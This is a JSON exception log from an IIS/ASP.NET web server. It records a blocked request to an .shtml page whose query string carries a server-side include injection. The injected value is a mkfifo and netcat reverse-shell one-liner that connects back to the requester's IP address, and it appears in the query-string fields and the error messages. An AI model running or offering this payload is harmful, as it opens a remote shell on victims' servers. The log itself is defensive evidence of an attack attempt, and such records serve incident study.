{ "application": "/LM/W3SVC/1/ROOT", "host": "gapcweb1", "type": "System.Web.HttpRequestValidationException", "message": "A potentially dangerous Request.QueryString value was detected from the client (camnbr=\"<!--#exec cmd=\"mkfif...\").", "source": "System.Web", "detail": "System.Web.HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (camnbr=\"<!--#exec cmd=\"mkfif...\").\r\n   at System.Web.HttpRequest.ValidateString(String value, String collectionKey, RequestValidationSource requestCollection)\r\n   at System.Web.HttpRequest.ValidateHttpValueCollection(HttpValueCollection collection, RequestValidationSource requestCollection)\r\n   at System.Web.HttpRequest.get_QueryString()\r\n   at DevExpress.Web.BinaryStorageSubscriber.RequestRecipient(HttpRequest request, RequestEvent requestEvent)\r\n   at DevExpress.Web.ASPxHttpHandlerModule.ProcessRequestCore(RequestEvent requestEvent)\r\n   at DevExpress.Web.ASPxHttpHandlerModule.BeginRequestHandler(Object sender, EventArgs e)\r\n   at System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\r\n   at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)", "time": "2023-09-25T12:56:03.7578825Z", "statusCode": 500, "webHostHtmlMessage": "<!DOCTYPE html>\r\n<html>\r\n    <head>\r\n        <title>A potentially dangerous Request.QueryString value was detected from the client (camnbr=&quot;&lt;!--#exec cmd=&quot;mkfif...&quot;).<\/title>\r\n        <meta name=\"viewport\" content=\"width=device-width\" />\r\n        <style>\r\n         body {font-family:\"Verdana\";font-weight:normal;font-size: .7em;color:black;} \r\n         p {font-family:\"Verdana\";font-weight:normal;color:black;margin-top: -5px}\r\n         b {font-family:\"Verdana\";font-weight:bold;color:black;margin-top: -5px}\r\n         H1 { font-family:\"Verdana\";font-weight:normal;font-size:18pt;color:red }\r\n         H2 { font-family:\"Verdana\";font-weight:normal;font-size:14pt;color:maroon }\r\n         pre {font-family:\"Consolas\",\"Lucida Console\",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}\r\n         .marker {font-weight: bold; color: black;text-decoration: none;}\r\n         .version {color: gray;}\r\n         .error {margin-bottom: 10px;}\r\n         .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }\r\n         @media screen and (max-width: 639px) {\r\n          pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }\r\n         }\r\n         @media screen and (max-width: 479px) {\r\n          pre { width: 280px; }\r\n         }\r\n        <\/style>\r\n    <\/head>\r\n\r\n    <body bgcolor=\"white\">\r\n\r\n            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver><\/H1>\r\n\r\n            <h2> <i>A potentially dangerous Request.QueryString value was detected from the client (camnbr=&quot;&lt;!--#exec cmd=&quot;mkfif...&quot;).<\/i> <\/h2><\/span>\r\n\r\n            <font face=\"Arial, Helvetica, Geneva, SunSans-Regular, sans-serif \">\r\n\r\n            <b> Description: <\/b>ASP.NET has detected data in the request that is potentially dangerous because it might include HTML markup or script. The data might represent an attempt to compromise the security of your application, such as a cross-site scripting attack. If this type of input is appropriate in your application, you can include code in a web page to explicitly allow it. For more information, see http://go.microsoft.com/fwlink/?LinkID=212874.\r\n            <br><br>\r\n\r\n            <b> Exception Details: <\/b>System.Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (camnbr=&quot;&lt;!--#exec cmd=&quot;mkfif...&quot;).<br><br>\r\n\r\n            <b>Source Error:<\/b> <br><br>\r\n\r\n            <table width=100% bgcolor=\"#ffffcc\">\r\n               <tr>\r\n                  <td>\r\n                      <code>\r\n\r\nAn unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.<\/code>\r\n\r\n                  <\/td>\r\n               <\/tr>\r\n            <\/table>\r\n\r\n            <br>\r\n\r\n            <b>Stack Trace:<\/b> <br><br>\r\n\r\n            <table width=100% bgcolor=\"#ffffcc\">\r\n               <tr>\r\n                  <td>\r\n                      <code><pre>\r\n\r\n[HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (camnbr=&quot;&lt;!--#exec cmd=&quot;mkfif...&quot;).]\r\n   System.Web.HttpRequest.ValidateString(String value, String collectionKey, RequestValidationSource requestCollection) +11984083\r\n   System.Web.HttpRequest.ValidateHttpValueCollection(HttpValueCollection collection, RequestValidationSource requestCollection) +221\r\n   System.Web.HttpRequest.get_QueryString() +72\r\n   DevExpress.Web.BinaryStorageSubscriber.RequestRecipient(HttpRequest request, RequestEvent requestEvent) +14\r\n   DevExpress.Web.ASPxHttpHandlerModule.ProcessRequestCore(RequestEvent requestEvent) +220\r\n   DevExpress.Web.ASPxHttpHandlerModule.BeginRequestHandler(Object sender, EventArgs e) +18\r\n   System.Web.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +139\r\n   System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +91\r\n<\/pre><\/code>\r\n\r\n                  <\/td>\r\n               <\/tr>\r\n            <\/table>\r\n\r\n            <br>\r\n\r\n    <\/body>\r\n<\/html>\r\n", "serverVariables": { "APPL_MD_PATH": "/LM/W3SVC/1/ROOT", "APPL_PHYSICAL_PATH": "C:\\inetpub\\wwwroot\\", "AUTH_PASSWORD": "*****", "CONTENT_LENGTH": "0", "GATEWAY_INTERFACE": "CGI/1.1", "HTTPS": "off", "INSTANCE_ID": "1", "INSTANCE_META_PATH": "/LM/W3SVC/1", "LOCAL_ADDR": "10.3.1.4", "PATH_INFO": "/incl/image_test.shtml", "PATH_TRANSLATED": "C:\\inetpub\\wwwroot\\incl\\image_test.shtml", "QUERY_STRING": "camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2031.220.1.83%208%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e", "REMOTE_ADDR": "31.220.1.83", "REMOTE_HOST": "31.220.1.83", "REMOTE_PORT": "47280", "REQUEST_METHOD": "GET", "SCRIPT_NAME": "/incl/image_test.shtml", "SERVER_NAME": "10.3.1.4", "SERVER_PORT": "80", "SERVER_PORT_SECURE": "0", "SERVER_PROTOCOL": "HTTP/1.0", "SERVER_SOFTWARE": "Microsoft-IIS/10.0", "URL": "/incl/image_test.shtml" }, "queryString": { "camnbr": "<!--#exec cmd=\"mkfifo /tmp/s;nc -w 5 31.220.1.83 8 0<\/tmp/s|/bin/sh>/tmp/s 2>/tmp/s;rm /tmp/s\" -->" } }